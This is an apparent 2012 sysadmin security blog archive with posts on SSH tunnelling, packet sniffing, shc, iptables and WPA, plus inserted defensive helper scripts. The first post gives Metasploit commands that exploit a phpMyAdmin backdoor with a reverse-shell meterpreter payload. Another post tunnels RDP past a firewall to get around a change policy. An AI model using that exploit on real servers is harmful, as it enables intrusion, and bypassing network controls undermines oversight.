Thursday, September 27, 2012

phpMyAdmin server_sync.php Backdoor

One of the mirrors, namely cdnetworks-kr-1, was being used to distribute a modified archive of phpMyAdmin, which includes a backdoor. This backdoor is located in file server_sync.php and allows an attacker to remotely execute PHP code. Another file, js/cross_framing_protection.js, has also been modified.

Exploit for msf:

commands:
    use exploit/multi/http/phpmyadmin_3522_backdoor
    set RHOST
    set PATH /phpMyAdmin-
    set PAYLOAD php/meterpreter/reverse_tcp
    set LHOST

Monday, September 17, 2012

Tunnel into secure network (SSH TUNNEL)

This post will be a note to future Ali :)

Let's think about a network which is protected by a firewall, and this firewall only allows specific ports, one of them being SSH.

Today at work, I had to access one of our branch campuses with RDP, and I could not add a NAT rule because of our change policy on the network.

Sample Network Map

In this scenario I could not make a change on the firewall, so I used my internal SSH server as an agent.

I used the ssh port forwarding feature and tunneled my RDP traffic inside the SSH tunnel. Basically my SSH server was connecting to the RDP server, but the firewall was seeing only SSH traffic.

Anyway, to cut a long story short, I used this command on my laptop to tunnel my RDP traffic to the SSH server:

ssh -L 3389:{ip of windows server}:3389 {ip of ssh server} -l {ssh user} -N

Basically, I used this command: ssh -L 3389: -l root -N. After that I opened my RDP client and tried to connect.

This command made my laptop listen on TCP port 3389 and forward to my SSH server, and my SSH server was forwarding all the traffic on to the Windows server.
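As an added example (not the post's own one-liner), the sh functions below wrap the same ssh -L forward: they pin the local listener to 127.0.0.1 so nobody else on the laptop's network can ride the tunnel to the RDP server, and they parse `ss -ltn` output to confirm what the forwarded port is really bound to before the RDP client is started. Host names, the user name and the `ss` sample are constructed placeholders.

```shell
#!/bin/sh
# Added example: a safer wrapper around the post's "ssh -L 3389:..." forward.
# All hosts and users are placeholders; SAMPLE_SS is constructed for the demo.

# tunnel_cmd LOCAL_PORT RDP_HOST SSH_HOST SSH_USER
# Prints the ssh command line.  Binding to 127.0.0.1 keeps the forwarded port
# off the laptop's other interfaces; ExitOnForwardFailure makes ssh fail loudly
# if LOCAL_PORT is already taken instead of running with no forward at all.
tunnel_cmd() {
    printf 'ssh -N -o ExitOnForwardFailure=yes -L 127.0.0.1:%s:%s:3389 -l %s %s' \
        "$1" "$2" "$4" "$3"
}

# listener_addr PORT
# Reads `ss -ltn` (or `netstat -ltn`) output on stdin and prints the address
# the listener on PORT is bound to; exits 1 if nothing listens on PORT.
listener_addr() {
    awk -v port="$1" '
        NR > 1 {                                   # skip the header line
            n = split($4, a, ":")                  # Local Address:Port
            if (a[n] == port) {
                print substr($4, 1, length($4) - length(port) - 1)
                found = 1
            }
        }
        END { exit !found }'
}

# loopback_only ADDR: true when ADDR is a loopback address.
loopback_only() {
    case "$1" in
        127.*|"[::1]") return 0 ;;
        *) return 1 ;;
    esac
}

# check_tunnel PORT: verify the forward is up and private, using the live `ss`.
check_tunnel() {
    addr=$(ss -ltn | listener_addr "$1") || { echo "nothing listens on $1" >&2; return 1; }
    loopback_only "$addr" || { echo "port $1 is bound to $addr, not loopback" >&2; return 1; }
}

# Constructed sample of `ss -ltn` output (not captured from a real host).
SAMPLE_SS='State  Recv-Q Send-Q Local Address:Port  Peer Address:Port
LISTEN 0      128    127.0.0.1:3389      0.0.0.0:*
LISTEN 0      128    0.0.0.0:22          0.0.0.0:*'

# Usage (not run automatically):
#   $(tunnel_cmd 3389 10.1.1.5 ssh.example.org alice) &
#   sleep 2 && check_tunnel 3389 && rdesktop 127.0.0.1:3389
```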

Saturday, September 15, 2012

Packet Sniffing Basics

Your data isn't safe on public networks. You may not even realize the extent to which that statement is true.

Imagine this: you're sitting in your local coffee shop sucking down your morning caffeine fix before heading into the office. You catch up on your work e-mail, you check Facebook and you upload that financial report to your company's FTP server. Overall, it's been a constructive morning. By the time you get to work, there's a whirlwind of chaos throughout the office. That incredibly sensitive financial report you uploaded was somehow leaked to the public, and your boss is outraged by the crass and unprofessional e-mail you just sent him. Was there some hacker lurking in the shadows that broke into your company's network and decided to lay the blame on you? More than likely not. This mischievous ne'er-do-well probably was sitting in the coffee shop you stopped at and seized the opportunity.
Without some form of countermeasures, your data isn't safe on public networks. This example is a worst-case scenario on the far end of the spectrum, but it isn't so far-fetched. There are people out there who are capable of stealing your data. The best defense is to know what you can lose, how it can get lost and how to defend against it.

What Is Packet Sniffing?

Packet sniffing, or packet analysis, is the process of capturing any data passed over the local network and looking for any information that may be useful. Most of the time, we system administrators use packet sniffing to troubleshoot network problems (like finding out why traffic is so slow in one part of the network) or to detect intrusions or compromised workstations (like a workstation that is connected to a remote machine on port 6667 continuously when you don't use IRC clients), and that is what this type of analysis originally was designed for. But, that didn't stop people from finding more creative ways to use these tools. The focus quickly moved away from its original intent—so much so that packet sniffers are considered security tools instead of network tools now.
Figure 1. A Capture of a Packet of Someone Trying to Log In to a Web Site
Finding out what someone on your network is doing on the Internet is not some arcane and mystifying talent anymore. Tools like Wireshark, Ettercap or NetworkMiner give anybody the ability to sniff network traffic with a little practice or training. These tools have become increasingly easy to use and continue to make things easier to comprehend, which makes them more usable by a broader user base.

Figure 2. Tools like NetworkMiner can reconstruct images that have been broadcast on the network.

How Does It Work?

Now, you know that these tools are out there, but how exactly do they work? First, packet sniffing is a passive technique. No one actually is attacking your computer and delving through all those files that you don't want anyone to access. It's a lot like eavesdropping. My computer is just listening in on the conversation that your computer is having with the gateway.
Typically, when people think of network traffic, they think that it goes directly from their computers to the router or switch and up to the gateway and then out to the Internet, where it routes similarly until it gets to the specified destination. This is mostly true except for one fundamental detail. Your computer isn't directly sending the data anywhere. It broadcasts the data in packets that have the destination in the header. Every node on your network (or switch) receives the packet, determines whether it is the intended recipient and then either accepts the packet or ignores it.
For example, let's say you're loading the Web page on your computer “PC”. Your computer sends the request by basically shouting “Hey! Somebody get me!”, which most nodes simply will ignore. Your switch will pass it on to where it eventually will be received by, which will pass back its index page to the router, which then shouts “Hey! I have for PC!”, which again will be ignored by everyone except you. If others were on your switch with a packet sniffer, they'd receive all that traffic and be able to look at it.
Picture it like having a conversation in a bar. You can have a conversation with someone about anything, but other people are around who potentially can eavesdrop on that conversation, and although you thought the conversation was private, eavesdroppers can make use of that information in any way they see fit.
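The eavesdropper described above has to tell its network card to accept frames addressed to other machines, which Linux records as the promiscuous flag on the interface. The following sh script, an added example that is not part of the article, reads that flag from sysfs so a defender can spot a sniffer running on a host they administer; the sysfs layout and the 0x100 bit value (IFF_PROMISC) are from the Linux kernel, and the interface names in the usage comment are placeholders.

```shell
#!/bin/sh
# Added example, not from the article: a host-local check for the capability
# described above.  To receive frames addressed to other machines a sniffer
# puts the interface into promiscuous mode; Linux reports that as bit 0x100
# (IFF_PROMISC, from <linux/if.h>) in /sys/class/net/<iface>/flags.  This
# only sees sniffers on the machine it runs on, not on other hosts in the bar.

IFF_PROMISC=256   # 0x100

# is_promisc FLAGS: FLAGS is the hex value read from the flags file, e.g. 0x1103.
# Returns 0 (true) if the promiscuous bit is set.
is_promisc() {
    [ $(( $1 & IFF_PROMISC )) -ne 0 ]
}

# promisc_interfaces [SYSFS_NET]: print every interface under SYSFS_NET
# (default /sys/class/net) whose flags carry IFF_PROMISC, one per line.
promisc_interfaces() {
    base=${1:-/sys/class/net}
    for dir in "$base"/*; do
        [ -r "$dir/flags" ] || continue
        if is_promisc "$(cat "$dir/flags")"; then
            printf '%s\n' "${dir##*/}"
        fi
    done
}

# alert_if_promisc [SYSFS_NET]: exit non-zero and name the offenders if any
# interface is promiscuous; suitable for a cron job or a monitoring check.
alert_if_promisc() {
    found=$(promisc_interfaces "$1")
    [ -z "$found" ] && return 0
    printf 'promiscuous interface(s): %s\n' "$found" >&2
    return 1
}

# Usage (not run automatically):
#   alert_if_promisc || logger -p auth.warning "sniffer suspected on $(hostname)"
```

A capture tool that exits normally clears the flag again, so this catches sniffers while they run, not after the fact.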

What Kind of Information Can Be Gathered?

Most of the Internet runs in plain text, which means that most of the information you look at is viewable by someone with a packet sniffer. This information ranges from the benign to the sensitive. You should take note that all of this data is vulnerable only through an unencrypted connection, so if the site you are using has some form of encryption like SSL, your data is less vulnerable.
The most devastating data, and the stuff most people are concerned with, is user credentials. Your user name and password for any given site are passed in the clear for anyone to gather. This can be especially crippling if you use the same password for all your accounts on-line. It doesn't matter how secure your bank Web site is if you use the same password for that account and for your Twitter account. Further, if you type your credit-card information into an insecure Web page, it is just as vulnerable, although there aren't many (if any) sites that continue this practice for that exact reason.
There is a technique in the security world called session hijacking where an attacker uses a packet sniffer to gain access to a victim's session on a particular Web site by stealing the victim's session cookie for that site. For instance, say I was sniffing traffic on the network, and you logged in to Facebook and left the Remember Me On This Computer check box checked. That signals Facebook to send you a session cookie that your browser stores. I potentially could collect that cookie through packet sniffing, add it to my browser and then have access to your Facebook account. This is such a trivial task that it can be scripted easily (someone even has made a Firefox extension that will do it automatically), and there still aren't many Web sites that encrypt their traffic to the end user, making it a significant problem when using the public Internet.
Packet sniffers exist that are specifically designed for monitoring what you are up to on the Internet. They will rebuild the exact Web page you are looking at, photos you're browsing, videos you're watching, and even files you're downloading. These applications are tailored to look through a string of packet captures to find various packet streams and reassemble them on the fly. My roommate in college whipped up something that would display the contents of my browser in real time on his computer (a scary revelation indeed).
E-mail is another one of those things that people tend to get up in arms about, because there's an assumption of privacy in e-mail that is derived from the regular mail system. Your e-mail is sent out and viewable, just like anything else that emanates from your computer or the network. E-mail sniffing is what made the FBI's Carnivore program so infamous.

Since every packet bears a destination address in its header, it's possible that someone could sniff the network just to gather a browsing history of everyone on that segment. This may not be very insidious, but it's gathered data, and there's always someone willing to pay for all sorts of data.


I'm sure you're currently seconds from taking a pair of scissors to your network cable and swearing off the Internet for life, but fear not! There are less-drastic measures you can take to prevent such sensitive data loss. None of these precautions is the magic cure for eavesdroppers, but using even one of them will make you a less-desirable target. There's an old joke that says that when you're being chased by a bear, you don't need to outrun the bear, just the guy in front of you. You don't have to have the most secure computer on the block, just more secure than somebody else's. As with most network security, if people really want your data, they can get at it. However, most of the time, attackers aren't targeting a specific person, they're looking for targets of opportunity, so the more secure you are, the less likely you are to be such a target.
The first defense against eavesdropping is the Secure Socket Layer (SSL) used by most Web pages that handle sensitive information. This forces all the content shared back and forth between you and the site to be encrypted. Some sites use SSL for their login pages only. Most sites don't even use SSL at all. It's easy to tell—the URL in the address bar will start with https instead of http. Some sites offer you some choice in the matter. For instance, Google allows you to turn SSL on all the time within Gmail, thus encrypting all your e-mail traffic.
Modern network switches are designed to pass data intelligently to avoid packet collisions and excessive network traffic. If a packet is broadcast that is not intended for one of the nodes attached to it, the router will not rebroadcast to the local nodes. Likewise, if a packet is broadcast locally that is intended for another local node, the switch will not rebroadcast to the outside network. This forces strict segmentation on a network. For us, this means that someone using a packet sniffer on a switched network will not see any traffic from hosts not attached to the same switch. This doesn't mean much on small-scale networks, like you have at your house, but on a larger scale, it means that somebody can't sit in the breakroom sniffing traffic three floors up from the accounting department.
Wireless network encryption has come a long way in its short lifespan—going from no encryption to Wired Equivalent Privacy (WEP) encryption to Wi-Fi Protected Access (WPA) encryption. Wireless networks don't provide the same segmentation that the previously mentioned switches provide, meaning that any packet transmitted on a wireless access point gets rebroadcast to everyone else on the access point. Even though your traffic is encrypted under WEP, this encryption protects only the data from users not connected to that wireless network. The encryption scheme and key are identical for all users, so all your “encrypted” data is decryptable by anyone on the network, making your data essentially unencrypted. WPA solves this issue by isolating all users on the network and giving them a different encryption scheme even when the key is the same.
If you have SSH access to a computer outside your current network (which I'm sure most of us do), you can tunnel all your traffic through an SSH connection. You essentially are using the encryption of the SSH connection to protect all your data from eavesdroppers. There are two apparent downsides to this technique. First, your connection speed will drop, because now instead of going from you to the destination and back, your traffic will go from you to the SSH server to the destination and back. Second, your data is transmitted unencrypted from the remote end, so if that machine is vulnerable to packet sniffing, your data is no safer than it was at your local machine.
Virtual private networks are intended to allow users access to a network that otherwise would be inaccessible. However, they also can be used to protect your traffic, because VPN connections are encrypted. You can set up a private VPN for yourself just for this purpose, but it will have the same disadvantages as SSH tunneling. If you work for a company that has a VPN, you may be allowed to use it for this purpose, but your traffic will fall under the same policy and rules that you have in your office, so be careful what you use it for.

This document was written by Adrian Hannah.

Tuesday, May 22, 2012

Removing an offending SSH key

Hello. If, when you connect again to an IP address you have connected to before, the key recorded on your system differs from the key on that system, you get a warning like the one below. To remove it easily you can use the following command!

Someone could be eavesdropping on you right now 
(man-in-the-middle attack)!
It is also possible that the RSA host key has just been 
changed. The fingerprint for the RSA key sent by the remote host 
is a9:b5:f9:a6:06:76:12:56:8c:0a:95:c5:31:e5:gd:87. 
Please contact your system administrator.
Add correct host key in /home/ramesh/.ssh/known_hosts to get 
rid of this message.
Offending key in /home/akapucu/.ssh/known_hosts: 14 
Permission denied (publickey,password). 
# sed -i '14d' ~/.ssh/known_hosts
With this command you have deleted the SSH key on line 14.
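As an added example (not the post's own sed one-liner), the sh functions below pull the file name and line number out of the warning text instead of typing them by hand, show the entry before it is dropped, and keep a backup; the ssh-keygen -R alternative removes the host by name. File paths and the known_hosts contents in the usage comment are placeholders.

```shell
#!/bin/sh
# Added example (not the post's own sed one-liner): handle the "Offending key"
# warning without typing the line number by hand.  Paths are placeholders.
#
# Only remove the entry after confirming out of band (e.g. on the server's
# console) that the host key really changed: from the client side, this
# warning is exactly what a man-in-the-middle attack looks like.

# offending_line: read the ssh warning on stdin and print "FILE LINE"
# taken from the "Offending key in FILE: LINE" line.
offending_line() {
    sed -n 's/^Offending key in \([^:]*\): \([0-9][0-9]*\).*/\1 \2/p'
}

# show_line FILE N: print line N of FILE so the operator can see which host
# (and which key) is about to be dropped.
show_line() {
    sed -n "${2}p" "$1"
}

# remove_line FILE N: delete line N of FILE, keeping FILE.bak.  Same effect as
# the post's `sed -i '14d'`, but portable (no -i) and with a backup.
remove_line() {
    file=$1; n=$2
    cp "$file" "$file.bak" || return 1
    sed "${n}d" "$file.bak" > "$file"
}

# forget_host HOST [FILE]: the same cleanup by host name instead of line
# number, using ssh-keygen's own -R option.
forget_host() {
    ssh-keygen -R "$1" -f "${2:-$HOME/.ssh/known_hosts}"
}

# Usage (not run automatically): paste the warning into warning.txt, then
#   set -- $(offending_line < warning.txt)   # $1 = file, $2 = line
#   show_line "$1" "$2"                      # inspect before deleting
#   remove_line "$1" "$2"
```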

Wednesday, May 16, 2012

How to Encrypt Your Bash Shell Script on Linux Using SHC

Q: How do I encrypt my bash shell script in a Linux environment? The shell script contains a password, and I don't want others who have execute access to view the shell script and get the password. Is there a way to encrypt my shell script?

A: First, as a best practice you should not be encrypting your shell script. You should document your shell script properly so that anybody who views it understands exactly what it does. If it contains sensitive information like a password, you should find a different approach to writing the shell script that does not require encrypting it.
That being said, if you still insist on encrypting a shell script, you can use the SHC utility as explained below. Please note that an encrypted shell script created by shc is not readable by normal users. However, someone who understands how this works can extract the original shell script from the encrypted binary created by shc.
SHC stands for shell script compiler.

1. Download shc and install it

Download shc and install it as shown below.
# wget
# tar xvfz shc-3.8.7.tgz
# cd shc-3.8.7
# make
Verify that shc is installed properly.
$ ./shc -v
shc parse(-f): No source file specified

shc Usage: shc [-e date] [-m addr] [-i iopt] [-x cmnd] [-l lopt] [-rvDTCAh] -f

2. Create a Sample Shell Script

Create a sample bash shell script that you like to encrypt using shc for testing purpose.
For testing purpose, let us create the following shell script which generates random numbers. You have to specify how many random numbers you like to generate.
$ vi

#!/bin/bash

# Ask how many numbers to print, then print that many values of $RANDOM
echo -n "How many random numbers do you want to generate? "
read max

for (( start = 1; start <= $max; start++ ))
do
  echo -e $RANDOM
done

$ ./
How many random numbers do you want to generate? 3

3. Encrypt the Shell Script Using shc

Encrypt the shell scripting using shc as shown below.
$ ./shc -f
This will create the following two files:
$ ls -l*
-rwxrw-r--. 1 ramesh ramesh   149 Mar 27 01:09
-rwx-wx--x. 1 ramesh ramesh 11752 Mar 27 01:12
-rw-rw-r--. 1 ramesh ramesh 10174 Mar 27 01:12
  • is the original unencrypted shell script
  • is the encrypted shell script in binary format
  • is the C source code of the file. This C source code is compiled to create the above encrypted file. The whole logic behind the shc is to convert the shell script to C program (and of course compile that to generate the executable)
$ file Bourne-Again shell script text executable

$ file ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.18,

$ file ASCII C program text

4. Execute the Encrypted Shell Script

Now, let us execute the encrypted shell script to make sure it works as expected.
$ ./
How many random numbers do you want to generate? 3
Please note that the binary itself still depends on the shell named in the script's first line (i.e. /bin/bash) being available in order to execute the script.

5. Specifying Expiration Date for Your Shell Script

Using shc you can also specify an expiration date. i.e After this expiration date when somebody tries to execute the shell script, they'll get an error message.
Let us say that you don't want anybody to execute the after 31-Dec-2011 (I used last year date for testing purpose).
Create a new encrypted shell script using "shc -e" option to specify expiration date. The expiration date is specified in the dd/mm/yyyy format.
$ ./shc -e 31/12/2011 -f
In this example, if someone tries to execute the, after 31-Dec-2011, they'll get a default expiration message as shown below.
$ ./
./ has expired!
Please contact your provider
If you like to specify your own custom expiration message, use -m option (along with -e option as shown below).
$ ./shc -e 31/12/2011 -m "Contact [email protected] for new version of this script" -f

$ ./
./ has expired!
Contact [email protected] for new version of this script

6. Create Redistributable Encrypted Shell Scripts

Apart from -e, and -m (for expiration), you can also use the following options:
  • -r will relax security to create a redistributable binary that executes on other systems that runs the same operating system as the one on which it was compiled.
  • -T will allow the created binary files to be traceable using programs like strace, ltrace, etc.
  • -v is for verbose
Typically you might want to use both the -r and -T options to create a redistributable and traceable encrypted shell script, as shown below.
$ ./shc -v -r -T -f
shc shll=bash
shc [-i]=-c
shc [-x]=exec '%s' "$@"
shc [-l]=
shc opts=
shc: cc -o
shc: strip
shc: chmod go-r

$ ./
How many random numbers do you want to generate? 3
Finally, it is worth repeating again: You should not be encrypting your shell script in the first place. But, if you decided to encrypt your shell script using shc, please remember that a smart person can still generate the original shell script from the encrypted binary that was created by shc.
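The "different approach" the answer recommends, as an added example that is not part of the original post: keep the password out of the script entirely and read it at run time from a file that only the owner can read, refusing to continue when the file's owner or mode would let other accounts read it. File names are placeholders, and the mode check relies on GNU stat (Linux).

```shell
#!/bin/sh
# Added example, not from the post: the approach the answer recommends over
# shc.  The password never appears in the script; it is read at run time from a
# file that only the owner can read, and the script refuses to run if the
# file's owner or mode would let other accounts read it.
# File names are placeholders; uses GNU stat (Linux).

# secret_file_ok FILE: true only if FILE is a regular file, owned by the
# invoking user, with mode 0600 or 0400 (no group/other bits at all).
secret_file_ok() {
    f=$1
    [ -f "$f" ] || { echo "$f: not a regular file" >&2; return 1; }
    [ -O "$f" ] || { echo "$f: not owned by $(id -un)" >&2; return 1; }
    mode=$(stat -c '%a' "$f") || return 1
    case "$mode" in
        600|400) return 0 ;;
        *) echo "$f: mode $mode is too open, expected 600 or 400" >&2; return 1 ;;
    esac
}

# read_secret FILE: print the first line of FILE (the password) if the
# permission check passes, otherwise fail without printing anything.
read_secret() {
    secret_file_ok "$1" || return 1
    IFS= read -r line < "$1" || [ -n "$line" ] || return 1
    printf '%s\n' "$line"
}

# Example use (not run automatically): the script that used to embed the
# password now does
#   DB_PASS=$(read_secret "$HOME/.db_password") || exit 1
# and hands DB_PASS to the program through its environment or a prompt,
# never on the command line where `ps` would show it to every user.
```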


Wednesday, May 9, 2012

ls order by time

Sort by time newest first

# ls -lt
total 3788
-rw------- 1 root root 153211 Dec 21 13:20 cron
-rw------- 1 root root 3725 Dec 21 13:06 secure
-rw------- 1 root root 20864 Dec 21 13:06 messages
-rw-r----- 1 mysql mysql 8641 Dec 21 13:06 mysqld.log
-rw-r--r-- 1 root root 11462 Dec 21 13:06 yum.log
drwxrwxr-x 2 tomcat tomcat 4096 Dec 21 13:05 tomcat5
-rw------- 1 root utmp 379008 Dec 21 13:05 btmp
-rw-rw-r-- 1 root utmp 35712 Dec 21 13:05 wtmp
-rw------- 1 root root 0 Dec 21 13:04 faillog
-rw------- 1 root root 0 Dec 21 13:04 tallylog
-rw-r--r-- 1 root root 2921168 Dec 21 13:01 lastlog
-rw------- 1 root root 5869 Dec 20 01:00 rkhunter.log
-rw------- 1 root root 0 Dec 19 03:20 boot.log
-rw------- 1 root root 0 Dec 19 03:20 maillog
drwxrwsr-x 2 root mailman 4096 Dec 19 03:20 mailman
-rw------- 1 root root 0 Dec 19 03:20 spooler
drwxr-x--- 2 sso root 4096 Dec 19 03:20 sso
-rw------- 1 root root 443960 Dec 19 03:20 cron.1
-rw------- 1 root root 5239 Dec 17 17:04 secure.1

Sort by time newest last

# ls -ltr
total 3788
-rw-r--r-- 1 root root 0 Jun 25 15:00 dmesg
drwxr-xr-x 2 apache apache 4096 Jun 25 15:07 atmail
drwxr-xr-x 2 root root 4096 Jun 28 03:56 mail
-rw-r--r-- 1 root root 0 Jul 26 05:15 xferlog
-rw-rw-r-- 1 root utmp 1288320 Aug 25 03:14 wtmp.1
drwx------ 2 root root 4096 Aug 30 12:32 httpd
drwxr-x--- 2 apache apache 4096 Sep 2 03:20 psa-horde
drwx------ 2 root root 4096 Sep 15 04:46 samba
-rw------- 1 root root 0 Nov 21 03:20 spooler.4
-rw------- 1 root root 0 Nov 21 03:20 secure.4
-rw------- 1 root root 0 Nov 21 03:20 maillog.4
-rw------- 1 root root 0 Nov 21 03:20 boot.log.4
-rw------- 1 root root 4407 Nov 27 13:58 messages.4
-rw------- 1 root root 443981 Nov 28 03:20 cron.4
-rw------- 1 root root 0 Nov 28 03:20 spooler.3
-rw------- 1 root root 0 Nov 28 03:20 maillog.3
-rw------- 1 root root 0 Nov 28 03:20 boot.log.3
-rw------- 1 root root 1153 Dec 2 16:41 secure.3
-rw------- 1 root root 6841 Dec 4 19:38 messages.3

WPA Hole 196

The security world recently found a vulnerability in WPA2 Enterprise encryption. Researchers have found a vulnerability in the WPA2 encryption protocol. It is currently the strongest encryption method and is used in many, many businesses and homes around the world. They are calling the vulnerability "Hole 196" because it was discovered on page 196 of the IEEE 802.11 standard.
If you read the details of the exploit, you will learn that hackers must be authenticated and authorized on the WPA2 network to begin with. Once authorized, the user can use exploits to decrypt and/or inject malicious packets into other users' "secure" wireless traffic. This means the vulnerability can be exploited by a man-in-the-middle attack, according to the researcher, so that an unauthorized user can decrypt packets and sniff the network using open source software.
WPA2 is known as the most secure wireless encryption method available today, so this is big, big news. Hole 196 is a zero-day now, which means the security researchers have not yet found a patch for the vulnerability.

Resetting iptables

Hello friends. Most likely many iptables users have had this happen: locking the system against their own use. It has happened to me many times, and a feature I saw on Cisco routers gave me a very simple, practical idea. I don't remember the exact command, but it is a command for testing the configuration you have made: it activates the running config without writing it to the startup config, so that within the time you specify it resets and returns you to your old config. If anyone remembers it, please write it to me :) Anyway, back to our topic. The script we use is very simple; it resets iptables. Of course we put it in a cronjob before we start working, in case we lock ourselves out :)

#!/bin/bash
# To leave our firewall as it is, we leave the durum value below at 0.
# If we want to reset the firewall, durum must be 1 so that the block runs and clears the firewall.
durum=0
# For distributions other than CentOS, Red Hat and Fedora the value should be "hayir" (no);
# I use CentOS, so my value is "evet" (yes).
sistem=evet
# Path of the iptables binary
yol=/sbin/iptables

if [ "$durum" == "1" ]; then
    if [ "$sistem" == "evet" ]; then
        # To stop the firewall via its init script
        /etc/init.d/iptables stop
    else
        # For the other Linux distributions we use the commands below:
        # open the default policies first (a DROP policy would keep us locked out),
        # then flush, delete and zero every chain in every table.
        $yol -P INPUT ACCEPT
        $yol -P FORWARD ACCEPT
        $yol -P OUTPUT ACCEPT
        $yol -F
        $yol -X
        $yol -Z
        for tablo in $(cat /proc/net/ip_tables_names); do
            $yol -t $tablo -F
            $yol -t $tablo -X
            $yol -t $tablo -Z
        done
    fi
fi


To grant execute permission:

chmod +x /root/

To run this file every 5 minutes, add the line
*/5 * * * * root /root/
to /etc/crontab.
Important: before you start working, check the durum value above!!!
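The same insurance against locking yourself out, applied per change rather than by a blanket cron reset, as an added example that is not the post's script: the current ruleset is saved, the new one is loaded, and a background timer puts the saved rules back unless the change is confirmed within the timeout. It assumes iptables-save/iptables-restore; STATE_DIR and the rules file path are placeholders.

```shell
#!/bin/sh
# Added example, not the post's script: lock-out insurance per change.
# The current ruleset is saved, the new one is loaded, and a background timer
# restores the saved rules unless the change is confirmed within TIMEOUT
# seconds (so if the new rules cut off your own SSH session, access returns
# by itself).  Assumes iptables-save/iptables-restore; STATE_DIR is a
# placeholder path.  IPT_SAVE/IPT_RESTORE can be overridden for testing.

IPT_SAVE=${IPT_SAVE:-iptables-save}
IPT_RESTORE=${IPT_RESTORE:-iptables-restore}
STATE_DIR=${STATE_DIR:-/var/run/ipt-safe}

# apply_with_rollback RULES_FILE TIMEOUT
# Loads RULES_FILE (iptables-save format) and arms the rollback timer.
apply_with_rollback() {
    rules=$1; timeout=$2
    mkdir -p "$STATE_DIR" || return 1
    "$IPT_SAVE" > "$STATE_DIR/backup.rules" || return 1
    rm -f "$STATE_DIR/confirmed"
    if ! "$IPT_RESTORE" < "$rules"; then
        # new rules were rejected outright: put the old ones back right away
        "$IPT_RESTORE" < "$STATE_DIR/backup.rules"
        return 1
    fi
    # timer runs detached; it does nothing if confirm_rules ran in time
    (
        sleep "$timeout"
        [ -e "$STATE_DIR/confirmed" ] || "$IPT_RESTORE" < "$STATE_DIR/backup.rules"
    ) &
    echo $! > "$STATE_DIR/timer.pid"
}

# confirm_rules: run this from a *new* session once you know the rules work.
confirm_rules() {
    touch "$STATE_DIR/confirmed"
}

# Usage (not run automatically):
#   apply_with_rollback /root/new.rules 120   # then open a fresh SSH session
#   confirm_rules                             # from that session, within 120 s
```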

Human Factor on the Security System

The Problem with Technology and the Human Factor

Some organizations see the solution to information security problems as a purely technical one, and several suppliers propose the same idea with technical solutions. The security manager's technologies are firewalls, antivirus software, PKI systems, and VPNs. All of them are valuable and protect the network. But technology is fallible, just like humans, so the technology is only as good as the person who knows how to use it.
Computer Security

Everyone should have security on their computers and networks, but there are several shortcomings to that view. Even if the software were perfect, it would still have problems from hackers, testers, viruses and software mistakes. They will find unchecked memory, backdoors, and other weaknesses in commercial and in-house developed software. The problem is multiplied by the complexity of modern information technology systems. Organizations that use multi-layered security are going in the right direction, but it is hard for every layer of protection to be perfect. Protecting an organization's systems needs intelligent users who do not create security bugs in their systems.
Many organizations really don't understand their information security problems. They do not have all the information needed to be sure they know the right technical solution to a problem. They recognize the need for standard information security software; however, they rarely have a basic understanding of the requirements. They buy firewalls for protection but take no care to monitor security alarms, update attack signatures, or respond to new forms of network traffic. They scan e-mails for viruses but ignore JavaScript. For good security you need to educate your workers about worms, spam mail, viruses, etc.
The term "technical solution" brings high, unrealistic expectations, because technology requires a human to keep it up to date. Custom-made security technology is extremely expensive, while standard, cheap software is not as good and offers little of the advantage of custom-made security technology. This puts creating the best technology out of the hands of uneducated people, because they are stuck with below-standard technology when they do not know better. Last but not least, someone has to use this technology. This can bring big problems, because people make mistakes.
Information security is not much different from security in general. After all, no one would put heavy security on something unimportant. For example, who would put a heavy security lock on a box if it only holds something as unimportant as a rock? Also, if a car looks good but has a broken window, then the whole car is not safe, and the same is true of information security. Protection against cyber attacks works on the same idea. All weak points should be secured, whether on a desktop computer, an organization's server, or a corporate network. Information should also be entered through safe paths.
Human Factor on the Security System

There is a lot of security software in the world, for example firewalls, intrusion detection systems, antivirus, etc. Each type of software is designed to perform a certain function and will help protect a system. However, even the best software cannot guarantee one hundred percent system security. Even the most advanced technology and passwords cannot be one hundred percent safe. This is because people made the system, and people make mistakes. So people are the weakest part of technology.
The human factor is the main reason why attacks on many computers and systems succeed. There are many good examples: hackers, virus writers, and dangerous users use the human factor to their advantage. In other words, they use people to penetrate systems.
Some Examples about Security

Many people do not understand why using software with many weaknesses poses a security risk to their computer or system. Many computer users see their computer as an object. They want to use it like a washer, a microwave, or any other simple device. They don't want to know how it works, and even if they did, they would not understand it the way they understand the other objects they use. They just think that if they install a system that protects against viruses and software without weaknesses, they'll have nothing to worry about.
Not knowing about threats is only part of the problem. The human factor also comes into play. Much bad code begins at the drafting stage, especially when security policies and procedures are created. The security of wireless networks is in a poor state: many errors were made when the wireless protocols were designed, and much has been written about their program errors. As long as programmers and testers keep finding ways to bypass security, new exploits will be found. Even the most developed software will be used, but again the human factor will be there. If you have a poorly trained system administrator and users, the best firewall or other protection system in the world will not protect your system.
The way users treat confidential information is a careless approach to security. A similar situation can be seen in everyday life, for example a person leaving their keys in the door. A lot of systems use an empty or weak password. Some systems have the user's name as the password, just to access the system easily. Even when users use a complicated password that no one could guess, they write it on a piece of paper or forget it, so other users can find their passwords.
Another human trait which hackers use is curiosity. Many of us encounter e-mail worms at some time in our lives. We know that these worms arrive as attachments to infected messages. Sending the virus out is only half of what the virus writer has to do. The worm has to be activated to multiply through the system and on to other computers, and it can be activated by opening the attachment. You might think that users would become wary when seeing attachments to unexpected e-mail. But surprisingly, the hackers know how to use our curiosity.
It is interesting that people open unprotected e-mails even if they are not supposed to. Yet the number of people who open the e-mails is always the same. This can be explained by the fact that virus writers find new ways to trick people. On the other hand, viruses do not only infect e-mail messages; you can also find them all over the Internet.

Computers are becoming more common every day. Hacking is becoming more dangerous day by day, and hacking technologies are becoming more complex. Creating a good security system is not easy. There are many weak points in a system, and protecting them is a never-ending process. New technology is always being developed to solve problems, and it has its disadvantages too. Hackers, virus writers and dangerous users invent new ways to exploit the security software being used. The result is a war between cyber criminals and security professionals. It does not matter if you have the best security product or a professional security engineer; technology is only as good as the users who know what they are doing.
Ali Kapucu
Cracking a Cisco Router Password

If you have forgotten your router's enable secret password, or someone has set a password on the second-hand router you just bought and you do not know it, you need to crack the password before you can configure the router. If the configuration inside the router matters to us, we must not lose it either. Below we will learn, step by step, how to crack a router's password without losing the existing configuration.

